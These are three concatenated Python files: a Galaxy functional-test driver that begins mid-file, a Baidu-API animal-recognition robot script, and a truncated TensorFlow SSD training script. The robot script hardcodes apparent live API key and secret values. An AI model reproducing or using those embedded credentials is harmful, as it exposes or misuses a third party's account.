import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR', None)
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp(dir=tmpdir, prefix="tool_dependencies")
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml' ]:
if os.path.exists( data_manager_config ):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
master_api_key = get_master_api_key()
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = "%s,%s" % (tool_conf, shed_tool_conf)
shed_tool_data_table_config = default_shed_tool_data_table_config
if shed_tool_data_table_config is None:
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
config = dict(
admin_users='[email protected]',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='[email protected]',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
cleanup_job='onsuccess',
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
file_path=file_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
master_api_key=master_api_key,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_conf,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
)
config.update(database_conf(tmpdir))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff - todo read from
# Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir
return config
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherise find whatever Galaxy would use as the default and
# the sample data for fucntional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml' ]:
if os.path.exists( tool_data_config ):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
return tool_data_table_config_path
def nose_config_and_run( argv=None, env=None, ignore_files=[], plugins=None ):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin( StructuredTestDataPlugin() )
test_config.configure( argv )
result = run( test_config )
success = result.wasSuccessful()
return success
def copy_database_template( source, db_path ):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
urlretrieve(source, db_path)
else:
raise Exception( "Failed to copy database template from source %s" % source )
def database_conf(db_path, prefix="GALAXY"):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
dburi_var = "%s_TEST_DBURI" % prefix
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
return config
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'june_2007_style', 'blue'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update( _get_static_settings() )
return global_conf
def wait_for_http_server(host, port):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for i in range( 10 ):
# directly test the app, not the proxy
conn = httplib.HTTPConnection(host, port)
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running one.
"""
server = None
if port is not None:
server = httpserver.serve( webapp, host=host, port=port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
port = str( random.randint( 8000, 10000 ) )
server = httpserver.serve( webapp, host=host, port=port, start_loop=False )
break
except socket.error as e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( 8000, 1000 ) )
t = threading.Thread( target=server.serve_forever )
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info( "GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir )
return
try:
if os.path.exists(tempdir) and skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = os.path.join(tmpdir, 'shed_tools_dict')
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config(MIGRATED_TOOL_PANEL_CONFIG, shed_tools_dict)
elif testing_installed_tools:
for shed_tool_config in INSTALLED_TOOL_PANEL_CONFIGS:
has_test_data, shed_tools_dict = parse_tool_panel_config(shed_tool_config, shed_tools_dict)
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
with open(galaxy_tool_shed_test_file, 'w') as shed_tools_file:
shed_tools_file.write(json.dumps(shed_tools_dict))
if not os.path.isabs(galaxy_tool_shed_test_file):
galaxy_tool_shed_test_file = os.path.join(galaxy_root, galaxy_tool_shed_test_file)
os.environ['GALAXY_TOOL_SHED_TEST_FILE'] = galaxy_tool_shed_test_file
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # noqa, delay import because this brings in so many modules for small tests
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "config/galaxy.ini.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication( **simple_kwargs )
log.info( "Embedded Galaxy application started" )
database_contexts.galaxy_context = app.model.context
database_contexts.install_context = app.install_model.context
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.ini.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication( **simple_kwargs )
database_contexts.tool_shed_context = app.model.context
log.info( "Embedded Toolshed application started" )
return app
ServerWrapper = collections.namedtuple('ServerWrapper', ['app', 'server', 'name', 'host', 'port'])
def _stop(self):
if self.server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self.server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self.app is not None:
log.info("Stopping application %s" % self.name)
self.app.shutdown()
log.info("Application %s stopped." % self.name)
ServerWrapper.stop = _stop
def launch_server(app, webapp_factory, kwargs, prefix="GALAXY"):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
host = os.environ.get(host_env_key, DEFAULT_WEB_HOST)
port = os.environ.get(port_env_key, None)
webapp = webapp_factory(
kwargs[ 'global_conf' ],
app=app,
use_translogger=False,
static_enabled=True
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port)
log.info("Embedded web server for %s started" % name)
return ServerWrapper(
app, server, name, host, port
)
class TestDriver(object):
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info( "Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
if config_object is None:
config_object = self
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
if self.external_galaxy is None:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if hasattr(galaxy_config, '__call__'):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=default_tool_conf,
datatypes_conf=datatypes_conf_override,
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
handle_galaxy_config_kwds = getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
)
self.server_wrappers.append(server_wrapper)
log.info("Functional tests will be run against %s:%s" % (server_wrapper.host, server_wrapper.port))
else:
log.info("Functional tests will be run against %s" % self.external_galaxy)
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0):
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
tool = self.app.toolbox.get_tool(tool_id)
testdef = tool.tests[index]
test_case_cls = functional.test_toolbox.ToolTestCase
test_case = test_case_cls(methodName="setUp") # NO-OP
test_case.shed_tool_id = None
test_case.master_api_key = get_master_api_key()
test_case.user_api_key = get_user_api_key()
test_case.setUp()
test_case.do_it(testdef)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
sys.exit(test_driver_class().run())
__all__ = [
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
]
|
animal.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Date of establishment: November 27, 2018
@author: zhangzd
"""
import cv2 #导入cv2模块
import requests #导入requests模块
import json #导入json模块
import threading #导入threading模块
import time #导入时间模块
import base64 #导入base64模块
import numpy as np #导入numpy模块
from PIL import Image, ImageDraw, ImageFont #导入PIL模块
from xugu import *
import os
import signal
from aip import AipSpeech
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
audio_file='auido.mp3'
AppID = "15469649"
access_token = "" #定义sccess_token变量
API_KEY = "3vZgLINSnGGEafPflkTLzkGh" #定义API_KEY变量
SECRET_KEY = "8cUXtkMed2z86kqfyrV606ylnCmfcc48" #定义SECRET_KEY变量
frame = None #定义frame变量
now_time = 0 #定义now_time变量
animal_info = None #定义animal_info变量
client = AipSpeech(AppID, API_KEY, SECRET_KEY)
def save_audio(number):
result = client.synthesis(number, 'zh', 1, {
'vol': 5,
'per': 2
})
if not isinstance(result, dict):
with open(audio_file, 'wb') as f:
f.write(result)
os.popen("play *mp3")
def cvimg_to_b64(img):
"""
图片转换函数,将二进制图片转换为base64加密格式
"""
try:
image = cv2.imencode('.jpg', img)[1] #将图片格式转换(编码)成流数据,赋值到内存缓存中
base64_data = str(base64.b64encode(image))[2:-1] #将图片加密成base64格式的数据
return base64_data #返回加密后的结果
except Exception as e:
return "error"
def get_ai_access_token():
"""
获取token值
"""
url = "https://aip.baidubce.com/oauth/2.0/token?grant_type=" + \
"client_credentials&client_id=%s&client_secret=%s" % (API_KEY, SECRET_KEY)
try:
response = requests.get(url)
res_text = response.text
res_json = json.loads(res_text)
return str(res_json["access_token"])
except Exception:
return "error"
def get_animal(img64):
url = "https://aip.baidubce.com/rest/2.0/image-classify/v1/animal"
url = url + "?access_token=" + access_token
data = {
"image": img64, "type": 'animal'
}
try:
response = requests.post(url,data=data)
res_text=response.content.decode("utf-8")
res_json=json.loads(res_text)
return res_json
except Exception:
return "error"
def post_request(frame, nt):
"""
判断识别的是动物还是植物,并提取有效数据
"""
global animal_info
if time.time() - nt > 3: #判断时间差是否大于3
global now_time #声明now_time是全局变量
now_time = time.time() #给now_time重新赋值为当前秒数
img64 = cvimg_to_b64(frame) #调用cvimg_to_b64函数
res = get_animal(img64) #调用get_animal函数
print(res)
if "error_msg" in res:
if res["error_msg"] == 'Open api daily request limit reached':
raise Exception('Open api daily request limit reached')
if "error" not in res: #判断识别是否出错
try:
animal_info = res["result"] #将识别出来的结果赋值给animal_info
except:
pass
return #退出函数
def put_Text(cvimg, text, location, size=30):
"""
将动植物信息显示在屏幕上
"""
cvimg = Image.fromarray(cv2.cvtColor(cvimg, cv2.COLOR_BGR2RGB))
draw = ImageDraw.Draw(cvimg)
fontText = ImageFont.truetype("./simsun.ttc", size, encoding="utf-8")
draw.text(location, text, (255, 0, 0), font=fontText)
cvimg = cv2.cvtColor(np.array(cvimg), cv2.COLOR_RGB2BGR)
return cvimg
left_pin = Pin(9,Pin.OUT)
right_pin = Pin(3,Pin.OUT)
middle_pin = Pin(6,Pin.OUT)
def speed():
i = 40
middle_pin.write_analog(i)
left_pin.write_analog(0)
right_pin.write_analog(180)
flag = True
animal = None
while True:
while i<160 and flag == True:
if animal_info != None and len(animal_info) > 1:
if animal == animal_info[0]["name"]:
i+=1
if i == 160:
flag = False
animal = None
middle_pin.write_analog(i)
time.sleep(.2)
else:
right_pin.write_analog(0)
animal = animal_info[0]["name"]
save_audio(animal_info[0]["name"])
time.sleep(3)
else:
i+=1
if i == 160:
flag = False
animal = None
middle_pin.write_analog(i)
time.sleep(.2)
left_pin.write_analog(0)
right_pin.write_analog(180)
while i>40 and flag == False:
if animal_info != None and len(animal_info) > 1:
if animal == animal_info[0]["name"]:
i-=1
if i == 40:
flag = True
animal = None
middle_pin.write_analog(i)
time.sleep(.2)
else:
left_pin.write_analog(180)
animal = animal_info[0]["name"]
save_audio(animal_info[0]["name"])
time.sleep(3)
else:
i-=1
if i == 40:
flag = True
animal = None
middle_pin.write_analog(i)
time.sleep(.2)
left_pin.write_analog(0)
right_pin.write_analog(180)
def main(pid):
"""
程序主函数
"""
token = get_ai_access_token()
if token != "error":
global access_token
access_token = token
cap = cv2.VideoCapture(0) #创建摄像头对象
global now_time #声明now_time为全局变量
now_time = time.time() #将当前时间秒数赋值给now_time
while (True): #创建一个死循环用于循环读取摄像头数据
ret, frame = cap.read() #从摄像头中读取一张图片
if ret == True: #判断是否读取成功
#创建一个1280x800的窗口
frame1 = cv2.resize(frame, (1280, 800), interpolation=cv2.INTER_LINEAR)
#创建一个线程用于处理读取到的图片
t=threading.Thread(target=post_request,args=(frame,now_time,), name='POST_REQUEST')
t.start() #启动这个线程
if not animal_info or animal_info[0]["name"]=="非动物":
frame1 = put_Text(frame1, "Waiting...", (50, 50)) #在画布上显示Waiting
elif animal_info[0]["name"]!="非动物":
print(animal_info[0]) #打印动物信息
try:
#在画布上写字
#for i in range(5):
frame1 = put_Text(frame1, str(animal_info[0]["score"][:4]), (150, 0 * 70 + 50))
frame1 = put_Text(frame1, str(animal_info[0]["name"]), (320, 0 * 70 + 50))
#for i in range(5):
frame1 = put_Text(frame1, "score:", (50, 0 * 70 + 50))
frame1 = put_Text(frame1, "name:", (250, 0 * 70 + 50))
except Exception:
pass
cv2.imshow('Magic Image', frame1)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
os.kill(pid,signal.SIGKILL)
if __name__ == "__main__":
pid = os.getpid()
t_main = threading.Thread(target=main,args=(pid,))
t_main.start()
speed()
|
ssd_main.py
|
# Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training script for SSD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import multiprocessing
import sys
import threading
from absl import app
import tensorflow.compat.v1 as tf
from REDACTED.tensorflow_models.mlperf.models.rough.mlp_log import mlp_log
from REDACTED.tensorflow_models.mlperf.models.rough.ssd import coco_metric
from REDACTED.tensorflow_models.mlperf.models.rough.ssd import dataloader
from REDACTED.tensorflow_models.mlperf.models.rough.ssd import ssd_constants
from REDACTED.tensorflow_models.mlperf.models.rough.ssd import ssd_model
from REDACTED.tensorflow_models.mlperf.models.rough.util import train_and_eval_runner
# copybara:strip_begin
from REDACTED.REDACTED.multiprocessing import REDACTEDprocess
# copybara:strip_end
tf.flags.DEFINE_string(
'resnet_checkpoint',
'/REDACTED/mb-d/home/tpu-perf-team/ssd_checkpoint/resnet34_bs2048_2',
'Location of the ResNet checkpoint to use for model '
'initialization.')
tf.flags.DEFINE_string('hparams', '',
'Comma separated k=v pairs of hyperparameters.')
tf.flags.DEFINE_integer(
'num_shards', default=8, help='Number of shards (TPU cores) for '
'training.')
tf.flags.DEFINE_integer('train_batch_size', 64, 'training batch size')
tf.flags.DEFINE_integer('eval_batch_size', 1, 'evaluation batch size')
tf.flags.DEFINE_integer('eval_samples', 5000, 'The number of samples for '
'evaluation.')
tf.flags.DEFINE_integer(
'iterations_per_loop', 1000, 'Number of iterations per TPU training loop')
tf.flags.DEFINE_string(
'training_file_pattern',
'REDACTEDtrain*',
'Glob for training data files (e.g., COCO train - minival set)')
tf.flags.DEFINE_string(
'validation_file_pattern',
'REDACTEDval*',
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
tf.flags.DEFINE_bool(
'use_fake_data', False,
'Use fake data to reduce the input preprocessing overhead (for unit tests)')
tf.flags.DEFINE_string(
'val_json_file',
'REDACTEDinstances_val2017.json',
'COCO validation JSON containing golden bounding boxes.')
tf.flags.DEFINE_integer('num_examples_per_epoch', 118287,
'Number of examples in one epoch')
tf.flags.DEFINE_integer('num_epochs', 64, 'Number of epochs for training')
tf.flags.DEFINE_multi_integer(
'input_partition_dims',
default=None,
help=('Number of partitions on each dimension of the input. Each TPU core'
' processes a partition of the input image in parallel using spatial'
' partitioning.'))
tf.flags.DEFINE_integer(
'dataset_threadpool_size', default=48,
help=('The size of the private datapool size in dataset.'))
tf.flags.DEFINE_bool('run_cocoeval', True, 'Whether to run cocoeval')
FLAGS = tf.flags.FLAGS
_STOP = -1
def construct_run_config(iterations_per_loop):
"""Construct the run config."""
# Parse hparams
hparams = ssd_model.default_hparams()
hparams.parse(FLAGS.hparams)
return dict(
hparams.values(),
num_shards=FLAGS.num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
resnet_checkpoint=FLAGS.resnet_checkpoint,
val_json_file=FLAGS.val_json_file,
model_dir=FLAGS.model_dir,
iterations_per_loop=iterations_per_loop,
steps_per_epoch=FLAGS.num_examples_per_epoch // FLAGS.train_batch_size,
eval_samples=FLAGS.eval_samples,
transpose_input=False if FLAGS.input_partition_dims is not None else True,
use_spatial_partitioning=True
if FLAGS.input_partition_dims is not None else False,
dataset_threadpool_size=FLAGS.dataset_threadpool_size
)
# copybara:strip_begin
def REDACTED_predict_post_processing():
"""REDACTED batch-processes the predictions."""
q_in, q_out = REDACTEDprocess.get_user_data()
predict_post_processing(q_in, q_out)
# copybara:strip_end
def predict_post_processing(q_in, q_out):
"""Run post-processing on CPU for predictions."""
coco_gt = coco_metric.create_coco(FLAGS.val_json_file, use_cpp_extension=True)
current_step, predictions = q_in.get()
while current_step != _STOP and q_out is not None:
q_out.put((current_step,
coco_metric.compute_map(
predictions,
coco_gt,
use_cpp_extension=True,
nms_on_tpu=True)))
current_step, predictions = q_in.get()
def main(argv):
del argv # Unused.
params = construct_run_config(FLAGS.iterations_per_loop)
params['batch_size'] = FLAGS.train_batch_size // FLAGS.num_shards
input_partition_dims = FLAGS.input_partition_dims
train_steps = FLAGS.num_epochs * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
eval_steps = int(math.ceil(FLAGS.eval_samples / FLAGS.eval_batch_size))
runner = train_and_eval_runner.TrainAndEvalRunner(FLAGS.iterations_per_loop,
train_steps, eval_steps,
FLAGS.num_shards)
mlp_log.mlperf_print(key='cache_clear', value=True)
mlp_log.mlperf_print(key='init_start', value=None)
mlp_log.mlperf_print('global_batch_size', FLAGS.train_batch_size)
mlp_log.mlperf_print('opt_base_learning_rate', params['base_learning_rate'])
mlp_log.mlperf_print(
'opt_learning_rate_decay_boundary_epochs',
[params['first_lr_drop_epoch'], params['second_lr_drop_epoch']])
mlp_log.mlperf_print('opt_weight_decay', params['weight_decay'])
mlp_log.mlperf_print(
'model_bn_span', FLAGS.train_batch_size // FLAGS.num_shards *
params['distributed_group_size'])
mlp_log.mlperf_print('max_samples', ssd_constants.NUM_CROP_PASSES)
mlp_log.mlperf_print('train_samples', FLAGS.num_examples_per_epoch)
mlp_log.mlperf_print('eval_samples', FLAGS.eval_samples)
train_input_fn = dataloader.SSDInputReader(
FLAGS.training_file_pattern,
params['transpose_input'],
is_training=True,
use_fake_data=FLAGS.use_fake_data,
params=params)
eval_input_fn = dataloader.SSDInputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
distributed_eval=True,
count=eval_steps * FLAGS.eval_batch_size,
params=params)
def init_fn():
tf.train.init_from_checkpoint(params['resnet_checkpoint'], {
'resnet/': 'resnet%s/' % ssd_constants.RESNET_DEPTH,
})
runner.initialize(train_input_fn, eval_input_fn,
functools.partial(ssd_model.ssd_model_fn,
params), FLAGS.train_batch_size,
FLAGS.eval_batch_size, input_partition_dims, init_fn)
mlp_log.mlperf_print('init_stop', None)
mlp_log.mlperf_print('run_start', None)
if FLAGS.run_cocoeval:
# copybara:strip_begin
q_in, q_out = REDACTEDprocess.get_user_data()
processes = [
REDACTEDprocess.Process(target=REDACTED_predict_post_processing) for _ in range(4)
]
# copybara:strip_end_and_replace_begin
# q_in = multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE)
# q_out = multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE)
# processes = [
# multiprocessing.Process(
# target=predict_post_processing, args=(q_in, q_out))
# for _ in range(self.num_multiprocessing_workers)
# ]
# copybara:replace_end
